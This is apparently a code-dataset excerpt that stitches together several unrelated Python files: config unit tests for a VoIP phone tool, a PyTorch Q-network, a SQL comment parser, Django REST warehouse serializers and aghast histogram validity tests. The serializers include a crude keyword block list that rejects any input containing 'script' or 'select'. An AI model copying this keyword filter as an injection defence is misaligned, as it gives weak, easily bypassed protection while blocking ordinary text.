provider_test_validate = lambda: (
# sip.conf exists tftproot exists missing_file_count missing_polycom_files
(True, True, 0, []),
(False, True, 1, []),
(True, False, 1, []),
(True, True, 1, ["Config/features.cfg"]),
(True, True, 4,
["Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg"]),
(False, True, 5,
["Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg"]),
)
@data_provider(provider_test_validate)
def test_validate(self, sip_conf_state, tftproot_state, missing_file_count, missing_polycom_files):
mock_states = {}
mock_states["/etc/asterisk/sip.conf"] = sip_conf_state
mock_states["/srv/tftp/"] = tftproot_state
for path in missing_polycom_files:
mock_states[os.path.join("/srv/tftp/", path)] = False
helper = HelperTestValidate(mock_states)
with patch("os.path.exists", MagicMock(side_effect=helper.lookup)) as mock_os_path:
config = PolypyConfig()
config.json = {"lib_path": "/var/lib/polypy", "share_path": "/usr/share/polypy/",
"config_path": "/tmp/polypy.conf",
"package_path": "/usr/local/lib/python3.7/dist-packages/poly_py_tools",
"server_addr": "127.0.0.1",
"paths": {"asterisk": "/etc/asterisk/", "tftproot": "/srv/tftp/"}}
status = config.validate()
failed_counter = 0
for path in status:
if status[path] is False:
failed_counter = failed_counter + 1
self.assertEqual(missing_file_count, failed_counter)
self.assertEqual(status['/etc/asterisk/'], sip_conf_state)
self.assertEqual(status['/srv/tftp/'], tftproot_state)
self.assertEqual(status["/srv/tftp/000000000000.cfg"], "000000000000.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/000000000000-directory~.xml"],
"000000000000-directory~.xml" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/applications.cfg"],
"Config/applications.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/device.cfg"], "Config/device.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/features.cfg"],
"Config/features.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/H323.cfg"], "Config/H323.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/polycomConfig.xsd"],
"Config/polycomConfig.xsd" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/reg-advanced.cfg"],
"Config/reg-advanced.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/reg-basic.cfg"],
"Config/reg-basic.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/region.cfg"], "Config/region.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/sip-basic.cfg"],
"Config/sip-basic.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/sip-interop.cfg"],
"Config/sip-interop.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/site.cfg"], "Config/site.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/video.cfg"], "Config/video.cfg" not in missing_polycom_files)
provider_test_dictionary_add = lambda : (
("first", "nKhI"),
("last", "rAQhbM"),
("exten", "XZmx"),
("vm", "wOVLrkhDhWvisNXW"),
("mac", "oMbMxdFqBLWDfpDYl"),
("email", "FQSOXqCWP"),
("endpoint", "wPMRgSHhyXy"),
("cid_number", "ZqUaVz"),
("priority", "ckoJofRYAJ"),
("label", "vUkTydmDk"),
("did", "CQriEvEnQhbEIn"),
("group_dial", "nxFjCJshs"),
("site", "FnnBp"),
)
@data_provider(provider_test_dictionary_add)
def test_dictionary_add(self, word, alias):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.config_path = f.name
config.write_default_config(f.name)
config.add_dictionary_alias(word, alias)
self.assertTrue(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertTrue(alias in resultant_config['dictionary'][word])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
@data_provider(provider_test_dictionary_add)
def test_dictionary_del(self, word, alias):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.config_path = f.name
config.write_default_config(f.name)
config.add_dictionary_alias(word, alias)
self.assertTrue(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertTrue(alias in resultant_config['dictionary'][word])
config.del_dictionary_word(word, alias)
self.assertFalse(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertFalse(alias in resultant_config['dictionary'][word])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
provider_column_headers = lambda: (
(["Last name", "First Name", "Title", "Extension ", "Voicemail ", "Direct Phone", "Simul-ring", "Device", "MAC", "Email", "site", "callerid", "label", "priority"], {"first": 1, "last": 0, "exten": 3, "vm": 4, "mac": 8, "email": 9, "endpoint": 7, "cid_number": 11, "priority": 13, "label": 12, "did": 5, "group_dial": 6, "site": 10}),
)
@data_provider(provider_column_headers)
def test_map_csv(self, header, expected_map):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.set_default_config(f.name)
mapper = ColumnMapper(config)
config.set_map(mapper.match_columns(header))
fp = open(f.name, 'r')
saved_configs = json.load(fp)
fp.close()
self.assertEqual(expected_map, saved_configs['csvmap'])
def test_configs(self):
config = PolypyConfig()
config.json = "685d69b8-ff2d-40c4-85d9-08f4c453445b"
self.assertEqual("685d69b8-ff2d-40c4-85d9-08f4c453445b", config.configs())
def test_asterisk_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "72de147f-f46c-4286-a443-b9b4d8abbf37"
self.assertEqual("72de147f-f46c-4286-a443-b9b4d8abbf37", config.asterisk_path())
def test_tftproot_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['tftproot'] = "f3ab756c-a431-4c8f-92db-701906483121"
self.assertEqual("f3ab756c-a431-4c8f-92db-701906483121", config.tftproot_path())
def test_update_paths(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "3253989b-a86e-415f-8f0f-99f0117c1f28"
config.json['paths']['tftproot'] = "f646d882-8887-4639-a4b2-ca4930a4f4e2"
self.assertEqual("3253989b-a86e-415f-8f0f-99f0117c1f28", config.asterisk_path())
self.assertEqual("f646d882-8887-4639-a4b2-ca4930a4f4e2", config.tftproot_path())
config.update_paths('asterisk', "1b9a1167-e01f-458c-a992-708dd71c2a4a")
self.assertEqual("1b9a1167-e01f-458c-a992-708dd71c2a4a", config.asterisk_path())
config.update_paths('tftproot', "f174c720-1aea-4feb-b949-79dc953d77f8")
self.assertEqual("f174c720-1aea-4feb-b949-79dc953d77f8", config.tftproot_path())
def test_pjsip_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "a7707f61-2dd9-4653-8ea5-4cbad0402007"
self.assertEqual("a7707f61-2dd9-4653-8ea5-4cbad0402007/pjsip.conf", config.pjsip_path())
config.pjsip_path = MagicMock(return_value="aa7e7971-d515-49a4-8ded-38a04b0694d8")
self.assertEqual("aa7e7971-d515-49a4-8ded-38a04b0694d8", config.pjsip_path())
if __name__ == '__main__':
unittest.main()
| 43.868293 | 342 | 0.625431 |
794643c69737bbbfbdd141e078f2c15329996552 | 496 | py | Python | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class Q_Network(nn.Module):
def __init__(self, states, actions, hidden=[64,64]):
super(Q_Network, self).__init__()
self.fc1 = nn.Linear(states, hidden[0])
self.fc2 = nn.Linear(hidden[0], hidden[1])
self.fc3 = nn.Linear(hidden[1], actions)
def forward(self,state):
x = state
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
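# Usage sketch (not part of the original file): the state and action sizes below
# are illustrative assumptions, not values taken from the repository.
if __name__ == "__main__":
    net = Q_Network(states=8, actions=4)
    dummy_batch = torch.randn(32, 8)   # batch of 32 observation vectors
    q_values = net(dummy_batch)        # -> tensor of shape [32, 4], one Q-value per action
    print(q_values.shape)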
| 27.555556 | 56 | 0.594758 |
7946445db47174945f81ce7f9131ba7ac0a4e6e7 | 4,350 | py | Python | voxsql/parser.py | ccortezia/sqlnox | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
] | 1 | 2021-11-03T13:16:32.000Z | 2021-11-03T13:16:32.000Z | voxsql/parser.py | ccortezia/sqlnox | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
] | 1 | 2021-02-05T14:58:49.000Z | 2021-02-11T19:14:37.000Z | voxsql/parser.py | ccortezia/voxsql | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import List
from .framer import read_frames, BaseFrame
from .utils import text_block, text_field
from .regexes import (
REGEX_DESCRIPTION,
REGEX_NAME,
REGEX_DIALECT,
REGEX_PARAM,
REGEX_RETMODE,
REGEX_RETVAL,
)
__all__ = ['parse']
# --------------------------------------------------------------------------------------------------
# Public Symbols
# --------------------------------------------------------------------------------------------------
def parse(text):
return [
ParsedFrame.fromdict({
'base': {
'source': frame.source,
'header': frame.header,
'body': frame.body,
},
**_parse_frame(frame)
})
for frame in read_frames(text)
]
# --------------------------------------------------------------------------------------------------
# Local Private Functions
# --------------------------------------------------------------------------------------------------
def _parse_frame(frame):
return dict(
header=_parse_header(frame.header),
body=_parse_body(frame.body),
)
def _parse_header(header_text):
return dict(
source=header_text,
name=_parse_header_name(header_text),
desc=_parse_header_description(header_text),
dialect=_parse_header_dialect(header_text),
params=_parse_header_params(header_text),
retmode=_parse_header_retmode(header_text),
retvals=_parse_header_retval(header_text),
)
def _parse_header_description(header_text):
match = REGEX_DESCRIPTION.match(header_text)
return match and text_block(match.groups()[0])
def _parse_header_name(header_text):
match = REGEX_NAME.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_dialect(header_text):
match = REGEX_DIALECT.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_params(header_text):
return [
{
'source': text_block(match.group()),
'name': text_field(match.groupdict()['name']),
'type': text_field(match.groupdict()['type']),
'desc': text_block(match.groupdict()['desc']),
}
for match in REGEX_PARAM.finditer(header_text)
]
def _parse_header_retmode(header_text):
match = REGEX_RETMODE.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_retval(header_text):
return [
{
'source': text_block(match.group()),
'name': text_field(match.groupdict()['name']),
'type': text_field(match.groupdict()['type']),
'desc': text_block(match.groupdict()['desc']),
}
for match in REGEX_RETVAL.finditer(header_text)
]
def _parse_body(body_text):
return {'source': text_block(body_text)}
# --------------------------------------------------------------------------------------------------
# Local Data Structures
# --------------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class ParsedFrame:
base: 'BaseFrame'
header: 'ParsedHeader'
body: 'ParsedBody'
@classmethod
def fromdict(self, data):
return ParsedFrame(
base=BaseFrame(**data['base']),
header=ParsedHeader.fromdict(data['header']),
body=ParsedBody(**data['body']),
)
@dataclass(frozen=True)
class ParsedParam:
source: str
name: str
type: str
desc: str
@dataclass(frozen=True)
class ParsedRetval:
source: str
name: str
type: str
desc: str
@dataclass(frozen=True)
class ParsedHeader:
source: str
name: str
desc: str
dialect: str
params: List[ParsedParam]
retmode: str
retvals: List[ParsedRetval]
@classmethod
def fromdict(self, data):
return ParsedHeader(
source=data["source"],
name=data["name"],
desc=data["desc"],
dialect=data["dialect"],
params=[ParsedParam(**_) for _ in data["params"]],
retmode=data["retmode"],
retvals=[ParsedRetval(**_) for _ in data["retvals"]],
)
@dataclass(frozen=True)
class ParsedBody:
source: str
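# Usage sketch (not part of the original module). The exact frame syntax is defined
# by the .framer and .regexes helpers, which are not shown here, so the lines below
# only illustrate the intended shape of the API; the file name is hypothetical.
#
#   frames = parse(open("queries.sql").read())
#   for frame in frames:
#       print(frame.header.name, [param.name for param in frame.header.params])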
| 25.892857 | 100 | 0.541379 |
794644bfba342d60b2a4f6f05bf2d222bd169bf1 | 7,088 | py | Python | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from .models import AsnListModel, AsnDetailModel
from userprofile.models import Users
import re
from rest_framework.exceptions import APIException
def data_validate(data):
    script_obj = re.findall(r'script', str(data), re.IGNORECASE)
    select_obj = re.findall(r'select', str(data), re.IGNORECASE)
    if script_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
    elif select_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
    else:
        return data
def asn_data_validate(data):
    script_obj = re.findall(r'script', str(data), re.IGNORECASE)
    select_obj = re.findall(r'select', str(data), re.IGNORECASE)
    if script_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
    elif select_obj:
        raise APIException({'detail': 'Bad data cannot be stored'})
    else:
        # Build the next ASN code from the numeric part, e.g. 'ASN00000008' -> 'ASN00000009'
        asn_last_code = re.findall(r'\d+', str(data), re.IGNORECASE)
        if str(asn_last_code[0]) == '00000001':
            data = 'ASN' + '00000001'
        else:
            data = 'ASN' + str(int(asn_last_code[0]) + 1).zfill(8)
        return data
def openid_validate(data):
    if Users.objects.filter(openid=data).exists():
        return data
    else:
        raise APIException({'detail': 'User does not exist'})
def appid_validate(data):
    if Users.objects.filter(appid=data).exists():
        return data
    else:
        raise APIException({'detail': 'User does not exist'})
class ASNListGetSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=True, required=False)
asn_status = serializers.IntegerField(read_only=True, required=False)
supplier = serializers.CharField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = AsnListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'openid', ]
class ASNListPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
supplier = serializers.CharField(read_only=False, required=False)
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNListPartialUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNListUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailGetSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=True, required=False)
supplier = serializers.CharField(read_only=True, required=False)
goods_code = serializers.CharField(read_only=True, required=False)
goods_qty = serializers.IntegerField(read_only=True, required=False)
goods_actual_qty = serializers.IntegerField(read_only=True, required=False)
sorted_qty = serializers.IntegerField(read_only=True, required=False)
goods_shortage_qty = serializers.IntegerField(read_only=True, required=False)
goods_more_qty = serializers.IntegerField(read_only=True, required=False)
goods_damage_qty = serializers.IntegerField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'openid']
class ASNDetailPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
asn_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailPartialUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=False, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=False, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=False, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=False, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=False, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class MoveToBinSerializer(serializers.ModelSerializer):
bin_name = serializers.CharField(read_only=False, required=True, validators=[data_validate])
qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
| 50.628571 | 101 | 0.724464 |
794645faf5370563445912c1608de9b100a62b6f | 52,091 | py | Python | python/tests/test_validity.py | HDembinski/aghast | f3d45a6960033f48fb8f6b7e906cb36b9d9d8e95 | [
"BSD-3-Clause"
] | 18 | 2019-04-15T14:39:35.000Z | 2021-12-21T15:01:02.000Z | python/tests/test_validity.py | HDembinski/aghast | f3d45a6960033f48fb8f6b7e906cb36b9d9d8e95 | [
"BSD-3-Clause"
] | 27 | 2019-04-12T20:24:00.000Z | 2021-12-03T08:51:56.000Z | python/tests/test_validity.py | diana-hep/stagg | ed97e9abc870e729d300622253aa7e9c870f77ec | [
"BSD-3-Clause"
] | 11 | 2019-04-15T14:41:00.000Z | 2021-11-16T13:28:10.000Z | #!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/aghast/blob/master/LICENSE
import unittest
import numpy
from aghast import *
class Test(unittest.TestCase):
def runTest(self):
pass
def test_validity_Metadata(self):
h = Collection(
{}, metadata=Metadata("""{"one": 1, "two": 2}""", language=Metadata.json)
)
h.checkvalid()
assert h.metadata.data == """{"one": 1, "two": 2}"""
assert h.metadata.language == Metadata.json
def test_validity_Decoration(self):
h = Collection(
{},
decoration=Decoration("""points { color: red }""", language=Decoration.css),
)
h.checkvalid()
assert h.decoration.data == """points { color: red }"""
assert h.decoration.css == Decoration.css
def test_validity_RawInlineBuffer(self):
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawInlineBuffer(
numpy.zeros(1, dtype=numpy.int32)
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert len(h.instances[0].chunks[0].column_chunks[0].pages[0].array) == 1
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [5]
def test_validity_RawExternalBuffer(self):
buf = numpy.zeros(1, dtype=numpy.int32)
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawExternalBuffer(
buf.ctypes.data, buf.nbytes
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert len(h.instances[0].chunks[0].column_chunks[0].pages[0].array) == 1
buf = numpy.array([3.14], dtype=numpy.float64)
h = Ntuple(
[Column("one", Column.float64)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawExternalBuffer(
buf.ctypes.data, buf.nbytes
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [
3.14
]
def test_validity_InterpretedInlineBuffer(self):
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
numpy.zeros(1, dtype=numpy.int32), dtype=InterpretedInlineBuffer.int32
),
)
h.checkvalid()
assert h.values.array.tolist() == [0]
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
b"\x07\x00\x00\x00", dtype=InterpretedInlineBuffer.int32
),
)
h.checkvalid()
assert h.values.array.tolist() == [7]
def test_validity_InterpretedExternalBuffer(self):
buf = numpy.zeros(1, dtype=numpy.float64)
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedExternalBuffer(
buf.ctypes.data, buf.nbytes, dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
buf = numpy.array([3.14], dtype=numpy.float64)
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedExternalBuffer(
buf.ctypes.data, buf.nbytes, dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [3.14]
def test_validity_IntegerBinning(self):
h = BinnedEvaluatedFunction(
[Axis(IntegerBinning(10, 20))],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
h = BinnedEvaluatedFunction(
[Axis(IntegerBinning(20, 10))],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
assert not h.isvalid
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.nonexistent,
loc_overflow=IntegerBinning.nonexistent,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.below1,
loc_overflow=IntegerBinning.nonexistent,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.nonexistent,
loc_overflow=IntegerBinning.above1,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.below1,
loc_overflow=IntegerBinning.above1,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(13), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 13
def test_validity_RealInterval(self):
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(5, -5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
assert not h.isvalid
def test_validity_RealOverflow(self):
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 10
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.above1,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.above1,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.above2,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.above2,
loc_nanflow=RealOverflow.above3,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(13), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 13
def test_validity_RegularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
def test_validity_HexagonalBinning(self):
h = BinnedEvaluatedFunction(
[Axis(HexagonalBinning(3, 5, -5, -4))],
InterpretedInlineBuffer(
numpy.array([[0.0] * 2] * 3), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 2] * 3
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
qoverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 2] * 4), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 2] * 4
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
roverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 3] * 3), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 3] * 3
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
qoverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
roverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 3] * 4), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 3] * 4
def test_validity_EdgesBinning(self):
h = BinnedEvaluatedFunction(
[
Axis(
EdgesBinning(
[3.3],
overflow=RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.above2,
),
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
h = BinnedEvaluatedFunction(
[Axis(EdgesBinning([1.1, 2.2, 3.3]))],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
def test_validity_IrregularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(IrregularBinning([RealInterval(0.5, 1.5)]))],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
h = BinnedEvaluatedFunction(
[
Axis(
IrregularBinning(
[
RealInterval(0.5, 1.5),
RealInterval(1.5, 1.5),
RealInterval(0.0, 10.0),
]
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0]
def test_validity_CategoryBinning(self):
h = BinnedEvaluatedFunction(
[Axis(CategoryBinning(["one", "two", "three"]))],
InterpretedInlineBuffer(
